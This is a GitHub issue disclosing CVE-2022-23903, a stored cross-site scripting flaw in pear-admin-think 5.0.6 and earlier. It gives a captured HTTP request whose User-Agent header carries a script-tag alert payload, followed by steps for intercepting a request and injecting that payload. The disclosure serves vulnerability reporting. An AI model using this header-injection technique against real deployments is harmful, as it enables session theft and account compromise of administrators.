Headline
CVE-2022-23903: There is a stored xss vulnerability exists in pear-admin-think <=5.0.6 · Issue #1 · pearadmin/pear-admin-think
A Cross Site Scripting (XSS) vulnerability exists in pearadmin pear-admin-think <=5.0.6, which allows a login account to access arbitrary functions and cause stored XSS through a fake User-Agent.
[Suggested description]
Cross SIte Scripting (XSS) vulnerability exists in pear-admin-think <=5.0.6.
Login account to access arbitrary functions and cause stored xss through fake User-Agent
GET /admin.php/admin.photo/index HTTP/1.1
Host: pear.com
Upgrade-Insecure-Requests: 1
User-Agent: <script>alert('xss')</script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://pear.com/admin.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ar;q=0.8,en;q=0.7
Cookie: PHPSESSID=23c79928dabeae8f8bf5f314b506af17; thinkphp_show_page_trace=0|0; token=JLlWdnblQBd0Ol7lKSe2w25Dj0jjoAQq31642737531.5216
Connection: close
[Vulnerability details]
first, prepare two test accounts with different levels.
Senior administrator admin
Click on any function such as image management and Interception of request packets , Modify UA to xss payload and forward it
